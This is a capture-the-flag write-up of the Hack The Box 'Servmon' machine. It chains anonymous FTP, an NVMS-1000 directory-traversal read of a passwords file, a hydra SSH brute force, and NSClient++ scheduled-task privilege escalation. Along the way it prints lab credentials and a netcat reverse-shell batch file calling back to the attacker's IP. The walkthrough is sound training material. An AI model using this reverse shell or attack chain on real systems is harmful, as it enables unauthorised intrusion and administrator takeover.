Servmon

TL;DR

  • Connect as Anonymous to FTP server and find notes about the location of the passwords file
  • Use LFI on NVMS to read the passwords file
  • Bruteforce passwords file to get SSH access
  • Reuse password to connect to Nsclient++ Web UI
  • Create Nsclient++ schedule task to execute reverse shell as Administrator

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/servmon$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
# Nmap 7.60 scan initiated Sat Apr 18 18:36:13 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
Increasing send delay for 10.10.10.184 from 0 to 5 due to 136 out of 453 dropped probes since last increase.
Warning: 10.10.10.184 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.184 from 640 to 1000 due to 185 out of 616 dropped probes since last increase.
Nmap scan report for servmon.htb (10.10.10.184)
Host is up, received echo-reply ttl 127 (0.078s latency).
Scanned at 2020-04-18 18:36:13 CEST for 306s
Not shown: 54168 closed ports, 11351 filtered ports
Reason: 54168 resets and 11351 no-responses
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnC92+BCplDo38VDQIZzb7V3HN/OucvxF0VMDDoYShdUrpDUW6JcSR/Zr6cADbHy7eDLw2O+WW+M4SzH7kfpbTv3HvJ0z8iOsRs2nUrUint4CR/A2vYA9SFOk18FU0QUS0sByBIlemU0uiPxN+iRCcpFhZDj+eiVRF7o/XxNbExnhU/2n9MXwFS8XTYNeGqSLE1vV6KdpMfpJj/yey8gvEpDQTX5OQK+kkUHze3LXLyu/XVTKzfqUBMAP+IQ5F6ICWgaC1a+cx/D7C/aobCbqaXY+75t1mxbEMmm1Wv/42nVQxcT7tN2C3sds4VJkYgZKcBhsE0XdJcR9mTb1wWsg9
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMToH2eB7rzpMZuvElpHYko/TXSsOfG8EXWQxmC/T4PCaAmVRDgJWEFMHgpRilSAKoOBlS2RHWNpMJldTFbWSVo=
|   256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILbqSRVLRJFVNhD0W0C5xB7b3RoJZZKdM+jSGryFWOQa
80/tcp    open  tcpwrapped    syn-ack ttl 127
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_  Supported Methods: POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
5040/tcp  open  unknown       syn-ack ttl 127
5666/tcp  open  tcpwrapped    syn-ack ttl 127
6063/tcp  open  x11?          syn-ack ttl 127
6699/tcp  open  napster?      syn-ack ttl 127
7680/tcp  open  pando-pub?    syn-ack ttl 127
8443/tcp  open  ssl/https-alt syn-ack ttl 127
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|_    Document not found
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after:  2021-01-13T13:24:20
| MD5:   1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
| SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
| -----BEGIN CERTIFICATE-----
| MIICoTCCAYmgAwIBAgIBADANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAlsb2Nh
| bGhvc3QwHhcNMjAwMTE0MTMyNDIwWhcNMjEwMTEzMTMyNDIwWjAUMRIwEAYDVQQD
| DAlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDXCoMi
| kUUWbCi0E1C/LfZFrm4UKCheesOFUAITOnrCvfkYmUR0o7v9wQ8yR5sQR8OIxfJN
| vOTE3C/YZjPE/XLFrLhBpb64X83rqzFRwX7bHVr+PZmHQR0qFRvrsWoQTKcjrElo
| R4WgF4AWkR8vQqsCADPuDGIsNb6PyXSru8/A/HJSt5ef8a3dcOCszlm2bP62qsa8
| XqumPHAKKwiu8k8N94qyXyVwOxbh1nPcATwede5z/KkpKBtpNfSFjrL+sLceQC5S
| wU8u06kPwgzrqTM4L8hyLbsgGcByOBeWLjPJOuR0L/a33yTL3lLFDx/RwGIln5s7
| BwX8AJUEl+6lRs1JAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAAjXGVBKBNUUVJ51
| b2f08SxINbWy4iDxomygRhT/auRNIypAT2muZ2//KBtUiUxaHZguCwUUzB/1jiED
| s/IDA6dWvImHWnOZGgIUsLo/242RsNgKUYYz8sxGeDKceh6F9RvyG3Sr0OyUrPHt
| sc2hPkgZ0jgf4igc6/3KLCffK5o85bLOQ4hCmJqI74aNenTMNnojk42NfBln2cvU
| vK13uXz0wU1PDgfyGrq8DL8A89zsmdW6QzBElnNKpqNdSj+5trHe7nYYM5m0rrAb
| H2nO4PdFbPGJpwRlH0BOm0kIY0az67VfOakdo1HiWXq5ZbhkRm27B2zO7/ZKfVIz
| XXrt6LA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.60%T=SSL%I=7%D=4/18%Time=5E9B2D07%P=x86_64-pc-linux-gn
SF:u%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDo
SF:cument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCo
SF:ntent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,
SF:"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20fo
SF:und")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\
SF:nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
|   Check 4 (port 62863/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-18 18:43:52
|_  start_date: 1601-01-01 00:09:21

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 18:41:19 2020 -- 1 IP address (1 host up) scanned in 306.51 seconds

So we find 4 useful services:

  • FTP (21)
  • SSH (22)
  • IIS (80)
  • NSClient++ (8443)

The website is NVMS login page.

Website

Ftp anonymous

Let’s try to connect to the FTP service with the anonymous account.

magnussen@funcMyLife:~/servmon$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:magnussen): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
01-18-20  12:05PM       <DIR>          Users
ftp> dir Users
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
ftp> dir Users/Nadine
01-18-20  12:08PM                  174 Confidential.txt
ftp> get Users/Nadine/Confidential.txt
226 Transfer complete.
174 bytes received in 0.06 secs (2.8721 kB/s)
ftp> dir Users/Nathan
01-18-20  12:10PM                  186 Notes to do.txt
ftp> get Users/Nathan/Notes\ to\ do.txt
226 Transfer complete.
186 bytes received in 0.06 secs (2.9735 kB/s)

So there’s two directories: Nadine and Nathan, probably two system user. We also retrieve two text files, let’s read them.

magnussen@funcMyLife:~/servmon$ cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
magnussen@funcMyLife:~/servmon$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Ok, it seems there’s a passwords file on Nathan’s desktop.

NVMS-1000 LFI

When we search for CVE on NVMS-1000 we find the following exploit TVT NVMS 1000 - Directory Traversal

Let’s check that out:

LFI

This NVMS-1000 version is vulnerable to LFI, let’s try to retrieve the passwords file mentioned earlier.

LFI

Nice, we retrieve a password list.

SSH brute force

So we have a password list and some usernames, let’s brute force the SSH service to see if we can connect to it with an account.

As SSH username is case sensitive I’ve created a file with the two username with the first letter upper and lower

magnussen@funcMyLife:~/servmon$ cat user.txt
Nadine
nadine
Nathan
nathan
magnussen@funcMyLife:~/servmon$
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
magnussen@funcMyLife:~/servmon$ hydra -L user.txt -P Passwords.txt -s 22 -f servmon.htb ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 01:41:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://servmon.htb:22/
[22][ssh] host: servmon.htb   login: Nadine   password: L1k3B1gBut7s@W0rk
[STATUS] attack finished for servmon.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 01:41:10

Nice, we can log in as Nadine with L1k3B1gBut7s@W0rk.

magnussen@funcMyLife:~/servmon$ ssh Nadine@servmon.htb
Nadine@servmon.htb's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.     
 Volume Serial Number is 728C-D22C   

 Directory of C:\Users\Nadine        

19/04/2020  00:42    <DIR>          .
19/04/2020  00:42    <DIR>          ..        
19/04/2020  00:23    <DIR>          .ssh      
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts  
08/04/2020  22:28    <DIR>          Desktop   
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links     
18/01/2020  11:23    <DIR>          Music     
18/01/2020  11:31    <DIR>          OneDrive  
18/01/2020  11:23    <DIR>          Pictures  
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              16 Dir(s)  27,439,128,576 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
19/04/2020  00:16                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,438,882,816 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
3f12d64256b352f6d6aa65bd0e64e78c

Great, we have the user.txt flag. Just have to privesc now!

I AM ROOT

Nsclient++ privilege escalation

Previously we found Nsclient++ WEB UI:

Nsclient++ is a monitoring agent used for nagios

Nsclient++

If we check for CVE on NSClient we find NSClient++ 0.5.2.35 - Privilege Escalation.

Let’s retrieve the password of the WEB UI to exploit this CVE.

nadine@SERVMON C:\Users\Nadine\Desktop>cd "C:\Program Files"

nadine@SERVMON C:\Program Files>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files

08/04/2020  23:21    <DIR>          .
08/04/2020  23:21    <DIR>          ..
08/04/2020  23:21    <DIR>          Common Files
08/04/2020  23:18    <DIR>          Internet Explorer
19/03/2019  05:52    <DIR>          ModifiableWindowsApps
16/01/2020  19:11    <DIR>          NSClient++
08/04/2020  23:09    <DIR>          Reference Assemblies
08/04/2020  23:21    <DIR>          UNP
14/01/2020  09:14    <DIR>          VMware
08/04/2020  22:31    <DIR>          Windows Defender
08/04/2020  22:45    <DIR>          Windows Defender Advanced Threat Protection
19/03/2019  05:52    <DIR>          Windows Mail
19/03/2019  12:43    <DIR>          Windows Multimedia Platform
19/03/2019  06:02    <DIR>          Windows NT
19/03/2019  12:43    <DIR>          Windows Photo Viewer
19/03/2019  12:43    <DIR>          Windows Portable Devices
19/03/2019  05:52    <DIR>          Windows Security
19/03/2019  05:52    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  27,434,434,560 bytes free

nadine@SERVMON C:\Program Files>cd "NSClient++"

nadine@SERVMON C:\Program Files\NSClient++>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Program Files\NSClient++

16/01/2020  19:11    <DIR>          .
16/01/2020  19:11    <DIR>          ..
09/12/2015  01:17            28,672 boost_chrono-vc110-mt-1_58.dll
09/12/2015  01:17            50,688 boost_date_time-vc110-mt-1_58.dll
09/12/2015  01:17           117,760 boost_filesystem-vc110-mt-1_58.dll
09/12/2015  01:22           439,296 boost_program_options-vc110-mt-1_58.dll
09/12/2015  01:23           256,000 boost_python-vc110-mt-1_58.dll
09/12/2015  01:17           765,952 boost_regex-vc110-mt-1_58.dll
09/12/2015  01:16            19,456 boost_system-vc110-mt-1_58.dll
09/12/2015  01:18           102,400 boost_thread-vc110-mt-1_58.dll
14/01/2020  14:24                51 boot.ini
18/01/2018  16:51           157,453 changelog.txt
28/01/2018  23:33         1,210,392 check_nrpe.exe
19/04/2020  00:50    <DIR>          crash-dumps
05/11/2017  22:09           318,464 Google.ProtocolBuffers.dll
09/12/2015  00:16         1,655,808 libeay32.dll
05/11/2017  23:04            18,351 license.txt
05/10/2017  08:19           203,264 lua.dll
14/01/2020  14:24    <DIR>          modules
19/04/2020  00:47             3,792 nsclient.ini
19/04/2020  00:49            48,207 nsclient.log
05/11/2017  22:42            55,808 NSCP.Core.dll
28/01/2018  23:32         4,765,208 nscp.exe
05/11/2017  22:42           483,328 NSCP.Protobuf.dll
19/11/2017  17:18           534,016 nscp_json_pb.dll
19/11/2017  16:55         2,090,496 nscp_lua_pb.dll
23/01/2018  21:57           507,904 nscp_mongoose.dll
19/11/2017  16:49         2,658,304 nscp_protobuf.dll
05/11/2017  23:04             3,921 old-settings.map
28/01/2018  23:21         1,973,760 plugin_api.dll
23/05/2015  09:44         3,017,216 python27.dll
27/09/2015  16:42        28,923,515 python27.zip
28/01/2018  23:34           384,536 reporter.exe
19/04/2020  00:24    <DIR>          scripts
14/01/2020  14:24    <DIR>          security
09/12/2015  00:16           348,160 ssleay32.dll
23/05/2015  09:44           689,664 unicodedata.pyd
14/01/2020  14:24    <DIR>          web
05/11/2017  22:20         1,273,856 where_filter.dll
23/05/2015  09:44            47,616 _socket.pyd
              33 File(s)     53,153,314 bytes
               7 Dir(s)  27,433,824,256 bytes free

nadine@SERVMON C:\Program Files\NSClient++>typensclient.ini
'typensclient.ini' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
ยด# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts  
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script
`"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powers
hell.exe /noprofile -command -


; External scripts - A list of scripts available to run from the CheckExternalScripts modu
le. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]

; Undocumented key
gen = scripts\gen.bat

; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true


; SCHEDULE DEFENITION - Schedule definition for: default
[/settings/scheduler/schedules/default]

; SCHEDULE INTERAVAL - Time in seconds between each check
interval = 60


; Web server - Section for WEB (WEBServer.dll) (check_WEB) protocol options.
[/settings/WEB/server]

; ALLOWED HOSTS - A comma separated list of allowed hosts. You can use netmasks (/ syntax)  or * to create ranges. parent for this key is found under: /settings/default this is mark ed as advanced in favor of the parent.
allowed hosts = 127.0.0.1,10.10.15.43/23,10.10.14.8/23


; script: default - The configuration section for the  default script.
[/settings/external scripts/scripts/default]

We found the password to connect to the WEB UI (ew2x6SsGTxjRwXOT) and we find another interesting information, the only host allowed to connect to the admin menu is localhost.

Not a problem, let’s do some port forwarding before acceding to the WEB UI.

magnussen@funcMyLife:~/servmon$ ssh -L 8443:127.0.0.1:8443 Nadine@servmon.htb
Nadine@servmon.htb's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

First of all we have to upload our payload and netcat executable to execute it on the victim.

magnussen@funcMyLife:~/servmon$ cat magnussen.bat
@echo off
c:\temp\nc.exe 10.10.15.111 7777 -e cmd.exe
magnussen@funcMyLife:~/servmon$ scp magnussen.bat  Nadine@servmon.htb:c:/temp/
Nadine@servmon.htb's password:
magnussen.bat                                           100%   54     0.8KB/s   00:00    
magnussen@funcMyLife:~/servmon$ scp nc.exe Nadine@servmon.htb:c:/temp/
nc.exe                                           100%   54     0.8KB/s   00:00    

We have to create a custom script through the WEB UI in order to execute our payload with a schedule task.

Schedule Task

Then we have to create a schedule task to execute our custom script.

Schedule Task

Finally, we restart the service in order to apply the new configuration and wait for the connection.

magnussen@funcMyLife:~/servmon$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from servmon.htb 56452 received!
C:\Program Files\NSClient++> dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
23/04/2020  08:58                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,433,795,584 bytes free
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
887fe3797897795b474ceba6a399f7bd

I AM ROOT!

This was a fun box, pretty easy, but I’ve learned a few things, thanks dmw0ng!